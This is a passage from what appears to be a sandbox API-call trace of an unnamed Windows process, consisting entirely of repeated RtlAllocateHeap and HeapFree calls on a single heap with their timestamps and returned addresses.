RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d2f0 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d188 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d1a0 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d338 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d110 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d488 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d458 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d3f8 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d428 [0187.701] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d440 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d4a0 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d470 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d3e0 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d410 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d860 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d9b0 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d998 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d9e0 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d830 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dab8 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d890 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d800 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d878 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dad0 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60daa0 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d7e8 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d8a8 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d8f0 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d818 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d950 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60da28 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d848 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d9c8 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60da70 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d8c0 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d9f8 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60da40 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d938 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60da10 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d8d8 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d908 [0187.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d968 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d920 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d980 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60da58 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60da88 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dc38 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dc08 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dc98 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dba8 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dc20 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60db00 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60db18 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dbf0 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60db90 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dc50 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dc68 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dbd8 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dc80 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dae8 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60db30 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dbc0 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60db48 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60db60 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60db78 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d620 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d500 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d518 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d668 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d728 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d680 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d7d0 [0187.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d740 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d608 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d758 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d638 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d650 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d710 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d770 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d788 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d7a0 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d698 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d6b0 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d7b8 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d6f8 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d560 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d4e8 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d530 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d5c0 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d6c8 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d6e0 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d5a8 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d548 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d590 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d5d8 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d5f0 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60d578 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dd38 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dea0 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dd80 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60de58 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60df00 [0187.704] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dd50 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60ddf8 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60de70 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dfc0 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60df78 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60df18 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60de28 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60de88 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dd98 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60ddb0 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60ddc8 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60de10 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dd08 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dde0 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60df90 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60de40 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dfa8 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dfd8 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dcf0 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dee8 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dd20 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60dd68 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60df30 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60deb8 [0187.705] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x60df48 [0187.708] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606728 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606938 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6067a0 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606848 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606890 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6067e8 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606950 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6067b8 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6066b0 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606908 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606668 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606680 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6066c8 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6066e0 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606710 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606740 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606758 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606770 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606788 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6067d0 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606c38 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606ae8 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606bd8 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606b78 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606b00 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606b60 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606c20 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6069c8 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6069e0 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606c50 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606b90 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606b30 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606ba8 | out: hHeap=0x5e0000) returned 1 [0187.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606968 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606980 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606998 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6069b0 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6069f8 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606a58 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606a10 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606a70 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606a88 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606a28 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606bc0 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606b18 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606ad0 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606aa0 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606b48 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606a40 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606ab8 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606bf0 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606c08 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606de8 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606d70 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606ce0 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606d88 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606c98 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606da0 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606db8 | out: hHeap=0x5e0000) returned 1 [0187.710] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606dd0 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606e00 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606cb0 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606cf8 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606e18 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606d10 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606c68 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606cc8 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606d28 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606c80 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606d40 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606d58 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d350 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d140 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d308 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d278 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d260 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d290 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d368 | out: hHeap=0x5e0000) returned 1 [0187.755] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d158 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d1e8 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d200 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d248 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d0e0 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d128 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d1b8 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d170 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d380 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d398 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d2a8 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d218 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d2c0 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d1d0 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d320 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d3c8 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d2d8 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d3b0 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d0f8 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d230 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d2f0 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d188 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d1a0 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d338 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d110 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d488 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d458 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d3f8 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d428 | out: hHeap=0x5e0000) returned 1 [0187.756] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d440 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d4a0 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d470 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d3e0 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d410 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d860 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d9b0 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d998 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d9e0 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d830 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, 